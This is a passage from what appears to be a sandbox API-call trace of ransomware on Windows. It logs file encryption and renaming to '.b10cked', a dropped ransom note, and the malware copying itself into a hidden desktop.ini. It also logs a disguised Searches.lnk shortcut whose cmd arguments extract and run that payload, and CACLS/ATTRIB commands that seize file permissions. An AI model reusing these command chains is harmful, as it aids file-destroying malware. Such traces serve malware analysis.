lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0216.434] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xf8 [0216.435] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0216.435] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0216.435] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xf8 [0216.435] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0216.435] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0216.435] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xf8 [0216.435] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0216.435] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0216.435] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0xf8 [0216.435] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0216.435] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec4c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec4c*=0) returned 0x0 [0216.435] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0216.435] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0xf8 [0216.435] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0216.435] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0216.435] ReadFile (in: hFile=0x1b4, lpBuffer=0x130c368, nNumberOfBytesToRead=0x7b, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x130c368*, lpNumberOfBytesRead=0x12ec08*=0x7b, lpOverlapped=0x0) returned 1 [0216.436] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0216.436] WriteFile (in: hFile=0x1b4, lpBuffer=0x130c368*, nNumberOfBytesToWrite=0x7b, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x130c368*, lpNumberOfBytesWritten=0x12ec1c*=0x7b, lpOverlapped=0x0) returned 1 [0216.436] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=-123, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x7d [0216.436] ReadFile (in: hFile=0x1b4, lpBuffer=0x130c368, nNumberOfBytesToRead=0x7b, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x130c368*, lpNumberOfBytesRead=0x12ec08*=0x7b, lpOverlapped=0x0) returned 1 [0216.436] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=-123, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x7d [0216.437] WriteFile (in: hFile=0x1b4, lpBuffer=0x130c368*, nNumberOfBytesToWrite=0x7b, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x130c368*, lpNumberOfBytesWritten=0x12ec1c*=0x7b, lpOverlapped=0x0) returned 1 [0216.440] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Everywhere.search-ms", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0216.440] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Everywhere.search-ms", cchWideChar=20, lpMultiByteStr=0x1328794, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Everywhere.search-ms", lpUsedDefaultChar=0x0) returned 20 [0216.440] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ece0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ece0*=0) returned 0xf8 [0216.440] WriteFile (in: hFile=0x1b4, lpBuffer=0x12f27c*, nNumberOfBytesToWrite=0x4e8, lpNumberOfBytesWritten=0x12ed20, lpOverlapped=0x0 | out: lpBuffer=0x12f27c*, lpNumberOfBytesWritten=0x12ed20*=0x4e8, lpOverlapped=0x0) returned 1 [0216.441] CloseHandle (hObject=0x1b4) returned 1 [0216.441] GetShortPathNameW (in: lpszLongPath="C:\\Users\\Default\\Searches\\Everywhere.search-ms", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\Default\\Searches\\EVERYW~1.SEA") returned 0x26 [0216.441] GetShortPathNameW (in: lpszLongPath="C:\\Users\\Default\\Searches\\", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\Default\\Searches\\") returned 0x1a [0216.442] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\Default\\Searches\\EVERYW~1.SEA\" \"C:\\Users\\Default\\Searches\\Everywhere.search-ms.b10cked\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12ecec*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12ecdc | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\Default\\Searches\\EVERYW~1.SEA\" \"C:\\Users\\Default\\Searches\\Everywhere.search-ms.b10cked\"", lpProcessInformation=0x12ecdc*(hProcess=0x120, hThread=0x1b4, dwProcessId=0xc0c, dwThreadId=0xcb8)) returned 1 [0216.445] CloseHandle (hObject=0x120) returned 1 [0216.445] CloseHandle (hObject=0x1b4) returned 1 [0216.445] CharUpperBuffW (in: lpsz="C:\\Users\\Default\\Searches\\", cchLength=0x1a | out: lpsz="C:\\USERS\\DEFAULT\\SEARCHES\\") returned 0x1a [0216.445] CharUpperBuffW (in: lpsz="C:\\Users\\Default\\", cchLength=0x11 | out: lpsz="C:\\USERS\\DEFAULT\\") returned 0x11 [0216.445] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\DEFAULT\\SEARCHES\\", cchCount1=26, lpString2="C:\\USERS\\DEFAULT\\", cchCount2=17) returned 3 [0216.445] CharUpperBuffW (in: lpsz="C:\\Users\\Default\\Searches\\", cchLength=0x1a | out: lpsz="C:\\USERS\\DEFAULT\\SEARCHES\\") returned 0x1a [0216.445] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Desktop\\", cchLength=0x19 | out: lpsz="C:\\USERS\\EEBSYM5\\DESKTOP\\") returned 0x19 [0216.445] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\DEFAULT\\SEARCHES\\", cchCount1=26, lpString2="C:\\USERS\\EEBSYM5\\DESKTOP\\", cchCount2=25) returned 1 [0216.445] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Bl0cked-ReadMe.rtf", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF") returned 0x2d [0216.445] CharUpperBuffW (in: lpsz="type \"[FROM_PATH]\" > \"[TO_PATH]\"", cchLength=0x20 | out: lpsz="TYPE \"[FROM_PATH]\" > \"[TO_PATH]\"") returned 0x20 [0216.445] CharUpperBuffW (in: lpsz="[FROM_PATH]", cchLength=0xb | out: lpsz="[FROM_PATH]") returned 0xb [0216.445] GetShortPathNameW (in: lpszLongPath="C:\\Users\\Default\\Searches\\", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\Default\\Searches\\") returned 0x1a [0216.446] CharUpperBuffW (in: lpsz="type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"[TO_PATH]\"", cchLength=0x42 | out: lpsz="TYPE \"C:\\USERS\\EEBSYM5\\APPDATA\\ROAMING\\BL0CKE~1.RTF\" > \"[TO_PATH]\"") returned 0x42 [0216.446] CharUpperBuffW (in: lpsz="[TO_PATH]", cchLength=0x9 | out: lpsz="[TO_PATH]") returned 0x9 [0216.446] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\Default\\Searches\\Bl0cked-ReadMe.rtf\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12fb94*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12fb84 | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\Default\\Searches\\Bl0cked-ReadMe.rtf\"", lpProcessInformation=0x12fb84*(hProcess=0x120, hThread=0x1b4, dwProcessId=0xbd8, dwThreadId=0xa70)) returned 1 [0216.447] CloseHandle (hObject=0x120) returned 1 [0216.447] CloseHandle (hObject=0x1b4) returned 1 [0216.447] GetFileAttributesW (lpFileName="C:\\Users\\Default\\Searches\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\default\\searches\\bl0cked-readme.rtf")) returned 0xffffffff [0216.447] GetLastError () returned 0x2 [0216.447] CopyFileW (lpExistingFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\bl0cked-readme.rtf"), lpNewFileName="C:\\Users\\Default\\Searches\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\default\\searches\\bl0cked-readme.rtf"), bFailIfExists=0) returned 1 [0216.450] GetFileAttributesW (lpFileName="C:\\Users\\Default\\Searches\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\default\\searches\\bl0cked-readme.rtf")) returned 0x20 [0216.450] CompareStringW (Locale=0x409, dwCmpFlags=0x0, lpString1="\\", cchCount1=1, lpString2="\\", cchCount2=1) returned 2 [0216.450] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\Searches", lpFindFileData=0x12f9e4 | out: lpFindFileData=0x12f9e4) returned 0x1fec00 [0216.450] FindClose (in: hFindFile=0x1fec00 | out: hFindFile=0x1fec00) returned 1 [0216.450] CompareStringW (Locale=0x409, dwCmpFlags=0x0, lpString1="\\", cchCount1=1, lpString2="\\", cchCount2=1) returned 2 [0216.450] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\XEY8d7zI.exe", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe") returned 0x36 [0216.450] CharUpperBuffW (in: lpsz="attrib -r -s -h \"[TO_PATH]\" & del /f /q \"[TO_PATH]\" & type \"[FROM_PATH]\" > \"[TO_PATH]\" && attrib +h \"[TO_PATH]\" && attrib +h \"[TO_DIR]\"", cchLength=0x87 | out: lpsz="ATTRIB -R -S -H \"[TO_PATH]\" & DEL /F /Q \"[TO_PATH]\" & TYPE \"[FROM_PATH]\" > \"[TO_PATH]\" && ATTRIB +H \"[TO_PATH]\" && ATTRIB +H \"[TO_DIR]\"") returned 0x87 [0216.450] CharUpperBuffW (in: lpsz="[FROM_PATH]", cchLength=0xb | out: lpsz="[FROM_PATH]") returned 0xb [0216.450] GetShortPathNameW (in: lpszLongPath="C:\\Users\\Default\\Searches\\", lpszShortPath=0x123ffac, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\Default\\Searches\\") returned 0x1a [0216.450] CharUpperBuffW (in: lpsz="attrib -r -s -h \"[TO_PATH]\" & del /f /q \"[TO_PATH]\" & type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"[TO_PATH]\" && attrib +h \"[TO_PATH]\" && attrib +h \"[TO_DIR]\"", cchLength=0xb2 | out: lpsz="ATTRIB -R -S -H \"[TO_PATH]\" & DEL /F /Q \"[TO_PATH]\" & TYPE \"C:\\USERS\\EEBSYM5\\APPDATA\\ROAMING\\VMFCCE~1\\XEY8D7ZI.EXE\" > \"[TO_PATH]\" && ATTRIB +H \"[TO_PATH]\" && ATTRIB +H \"[TO_DIR]\"") returned 0xb2 [0216.450] CharUpperBuffW (in: lpsz="[TO_PATH]", cchLength=0x9 | out: lpsz="[TO_PATH]") returned 0x9 [0216.450] GetShortPathNameW (in: lpszLongPath="C:\\Users\\Default\\Searches", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\Default\\Searches") returned 0x19 [0216.451] CharUpperBuffW (in: lpsz="attrib -r -s -h \"C:\\Users\\Default\\Searches\\desktop.ini\" & del /f /q \"C:\\Users\\Default\\Searches\\desktop.ini\" & type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\Default\\Searches\\desktop.ini\" && attrib +h \"C:\\Users\\Default\\Searches\\desktop.ini\" && attrib +h \"[TO_DIR]\"", cchLength=0x122 | out: lpsz="ATTRIB -R -S -H \"C:\\USERS\\DEFAULT\\SEARCHES\\DESKTOP.INI\" & DEL /F /Q \"C:\\USERS\\DEFAULT\\SEARCHES\\DESKTOP.INI\" & TYPE \"C:\\USERS\\EEBSYM5\\APPDATA\\ROAMING\\VMFCCE~1\\XEY8D7ZI.EXE\" > \"C:\\USERS\\DEFAULT\\SEARCHES\\DESKTOP.INI\" && ATTRIB +H \"C:\\USERS\\DEFAULT\\SEARCHES\\DESKTOP.INI\" && ATTRIB +H \"[TO_DIR]\"") returned 0x122 [0216.451] CharUpperBuffW (in: lpsz="[TO_DIR]", cchLength=0x8 | out: lpsz="[TO_DIR]") returned 0x8 [0216.451] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C attrib -r -s -h \"C:\\Users\\Default\\Searches\\desktop.ini\" & del /f /q \"C:\\Users\\Default\\Searches\\desktop.ini\" & type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\Default\\Searches\\desktop.ini\" && attrib +h \"C:\\Users\\Default\\Searches\\desktop.ini\" && attrib +h \"C:\\Users\\Default\\Searches\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12fb88*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12fb78 | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C attrib -r -s -h \"C:\\Users\\Default\\Searches\\desktop.ini\" & del /f /q \"C:\\Users\\Default\\Searches\\desktop.ini\" & type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\Default\\Searches\\desktop.ini\" && attrib +h \"C:\\Users\\Default\\Searches\\desktop.ini\" && attrib +h \"C:\\Users\\Default\\Searches\"", lpProcessInformation=0x12fb78*(hProcess=0x1b4, hThread=0x120, dwProcessId=0x40c, dwThreadId=0xb78)) returned 1 [0216.455] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0xffffffff) returned 0x0 [0217.129] CloseHandle (hObject=0x1b4) returned 1 [0217.129] CloseHandle (hObject=0x120) returned 1 [0217.130] CompareStringW (Locale=0x409, dwCmpFlags=0x0, lpString1="\\", cchCount1=1, lpString2="\\", cchCount2=1) returned 2 [0217.130] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\Searches", lpFindFileData=0x12f9e4 | out: lpFindFileData=0x12f9e4) returned 0x1fec00 [0217.130] FindClose (in: hFindFile=0x1fec00 | out: hFindFile=0x1fec00) returned 1 [0217.130] GetTickCount () returned 0x3cb78 [0217.130] QueryPerformanceCounter (in: lpPerformanceCount=0x12fbfc | out: lpPerformanceCount=0x12fbfc*=27391922687) returned 1 [0217.130] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="\x6a\x1d\xfbf8\x12\x8400\x1d\x44cd\xd116\xe5d4\xd341\x655a\xb210") returned 1 [0217.130] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="\x54\x1d\xfbf8\x12\x8400\x1d\x44cd\xd116\xe5d4\xd341\x655a\xb210") returned 1 [0217.130] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="\x43\x1d\xfbf8\x12\x8400\x1d\x44cd\xd116\xe5d4\xd341\x655a\xb210") returned 1 [0217.130] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="\x61\x1d\xfbf8\x12\x8400\x1d\x44cd\xd116\xe5d4\xd341\x655a\xb210") returned 1 [0217.130] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="\x63\x1d\xfbf8\x12\x8400\x1d\x44cd\xd116\xe5d4\xd341\x655a\xb210") returned 1 [0217.130] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="\x37\x1d\xfbf8\x12\x8400\x1d\x44cd\xd116\xe5d4\xd341\x655a\xb210") returned 1 [0217.130] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="\x41\x1d\xfbf8\x12\x8400\x1d\x44cd\xd116\xe5d4\xd341\x655a\xb210") returned 1 [0217.130] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="\x36\x1d\xfbf8\x12\x8400\x1d\x44cd\xd116\xe5d4\xd341\x655a\xb210") returned 1 [0217.130] CompareStringW (Locale=0x409, dwCmpFlags=0x0, lpString1="\\", cchCount1=1, lpString2="\\", cchCount2=1) returned 2 [0217.130] CharUpperBuffW (in: lpsz="explorer.exe \"[DIR_NAME]\" & type \"[DIR_NAME]\\[HID_NAME]\" > \"%TEMP%\\[EXE_NAME]\" && \"%TEMP%\\[EXE_NAME]\"", cchLength=0x65 | out: lpsz="EXPLORER.EXE \"[DIR_NAME]\" & TYPE \"[DIR_NAME]\\[HID_NAME]\" > \"%TEMP%\\[EXE_NAME]\" && \"%TEMP%\\[EXE_NAME]\"") returned 0x65 [0217.130] CharUpperBuffW (in: lpsz="[DIR_NAME]", cchLength=0xa | out: lpsz="[DIR_NAME]") returned 0xa [0217.130] CharUpperBuffW (in: lpsz="explorer.exe \"Searches\" & type \"Searches\\[HID_NAME]\" > \"%TEMP%\\[EXE_NAME]\" && \"%TEMP%\\[EXE_NAME]\"", cchLength=0x61 | out: lpsz="EXPLORER.EXE \"SEARCHES\" & TYPE \"SEARCHES\\[HID_NAME]\" > \"%TEMP%\\[EXE_NAME]\" && \"%TEMP%\\[EXE_NAME]\"") returned 0x61 [0217.130] CharUpperBuffW (in: lpsz="[HID_NAME]", cchLength=0xa | out: lpsz="[HID_NAME]") returned 0xa [0217.130] CharUpperBuffW (in: lpsz="explorer.exe \"Searches\" & type \"Searches\\desktop.ini\" > \"%TEMP%\\[EXE_NAME]\" && \"%TEMP%\\[EXE_NAME]\"", cchLength=0x62 | out: lpsz="EXPLORER.EXE \"SEARCHES\" & TYPE \"SEARCHES\\DESKTOP.INI\" > \"%TEMP%\\[EXE_NAME]\" && \"%TEMP%\\[EXE_NAME]\"") returned 0x62 [0217.130] CharUpperBuffW (in: lpsz="[EXE_NAME]", cchLength=0xa | out: lpsz="[EXE_NAME]") returned 0xa [0217.130] CoInitialize (pvReserved=0x0) returned 0x0 [0217.131] CoCreateInstance (in: rclsid=0x4e06a4*(Data1=0x21401, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pUnkOuter=0x0, dwClsContext=0x5, riid=0x4b0dcc*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x12fc10 | out: ppv=0x12fc10*=0x1d3e18) returned 0x0 [0217.132] ShellLink:IUnknown:QueryInterface (in: This=0x1d3e18, riid=0x4d36fc*(Data1=0x214f9, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x12fbc8 | out: ppvObject=0x12fbc8*=0x1d3df0) returned 0x0 [0217.132] ShellLink:IUnknown:QueryInterface (in: This=0x1d3e18, riid=0x4d370c*(Data1=0x10b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x12fbc8 | out: ppvObject=0x12fbc8*=0x1d3dfc) returned 0x0 [0217.132] ShellLink:IShellLinkW:SetPath (This=0x1d3df0, pszFile="%SystemRoot%\\system32\\cmd.exe") returned 0x0 [0217.133] ShellLink:IShellLinkW:SetArguments (This=0x1d3df0, pszArgs="/C explorer.exe \"Searches\" & type \"Searches\\desktop.ini\" > \"%TEMP%\\jTCac7A6.exe\" && \"%TEMP%\\jTCac7A6.exe\"") returned 0x0 [0217.133] ShellLink:IShellLinkW:SetWorkingDirectory (This=0x1d3df0, pszDir="%CD%") returned 0x0 [0217.134] ShellLink:IShellLinkW:SetIconLocation (This=0x1d3df0, pszIconPath="%SystemRoot%\\system32\\shell32.dll", iIcon=3) returned 0x0 [0217.134] ShellLink:IShellLinkW:SetShowCmd (This=0x1d3df0, iShowCmd=7) returned 0x0 [0217.134] ShellLink:IPersistFile:Save (This=0x1d3dfc, pszFileName="C:\\Users\\Default\\Searches.lnk", fRemember=0) returned 0x0 [0217.142] ShellLink:IUnknown:Release (This=0x1d3dfc) returned 0x2 [0217.142] ShellLink:IUnknown:Release (This=0x1d3df0) returned 0x1 [0217.142] ShellLink:IUnknown:Release (This=0x1d3e18) returned 0x0 [0217.142] CoUninitialize () [0217.143] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0217.143] ReleaseMutex (hMutex=0xf8) returned 1 [0217.143] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0217.143] ReleaseMutex (hMutex=0xf8) returned 1 [0217.143] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0217.143] ReleaseMutex (hMutex=0xf8) returned 1 [0217.143] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0217.143] ReleaseMutex (hMutex=0xf8) returned 1 [0217.143] CreateFileW (lpFileName="C:\\Users\\Default\\Searches\\Indexed Locations.search-ms" (normalized: "c:\\users\\default\\searches\\indexed locations.search-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0217.177] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\Searches\\Indexed Locations.search-ms", nBufferLength=0x104, lpBuffer=0x12eab8, lpFilePart=0x12eab4 | out: lpBuffer="C:\\Users\\Default\\Searches\\Indexed Locations.search-ms", lpFilePart=0x12eab4*="Indexed Locations.search-ms") returned 0x35 [0217.177] GetLastError () returned 0x5 [0217.177] FormatMessageW (in: dwFlags=0x3300, lpSource=0x0, dwMessageId=0x5, dwLanguageId=0x0, lpBuffer=0x12ecc8, nSize=0x0, Arguments=0x0 | out: lpBuffer="\x6cc8\x1c\xed10\x12\xca84\x48\xed20\x12\xcad0\x48\xed10\x12\xfbac\x12\xadc8\x131\xed01\x12") returned 0x13 [0217.177] LocalFree (hMem=0x1c6cc8) returned 0x0 [0217.177] LoadStringW (in: hInstance=0x400000, uID=0xff84, lpBuffer=0x12cc84, cchBufferMax=4096 | out: lpBuffer="Cannot open file \"%s\". %s") returned 0x19 [0217.177] RaiseException (dwExceptionCode=0xeedfade, dwExceptionFlags=0x1, nNumberOfArguments=0x7, lpArguments=0x12ecb8) [0217.177] RtlUnwind (TargetFrame=0x12ed20, TargetIp=0x40675c, ExceptionRecord=0x12e7ec, ReturnValue=0x0) [0217.177] RtlUnwind (TargetFrame=0x12ed44, TargetIp=0x4068e4, ExceptionRecord=0x12e7ec, ReturnValue=0x0) [0217.177] CharUpperBuffW (in: lpsz="CACLS \"[FILENAME]\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"[FILENAME]\"", cchLength=0x47 | out: lpsz="CACLS \"[FILENAME]\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"[FILENAME]\"") returned 0x47 [0217.178] CharUpperBuffW (in: lpsz="[FILENAME]", cchLength=0xa | out: lpsz="[FILENAME]") returned 0xa [0217.178] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C CACLS \"C:\\Users\\Default\\Searches\\Indexed Locations.search-ms\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"C:\\Users\\Default\\Searches\\Indexed Locations.search-ms\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, 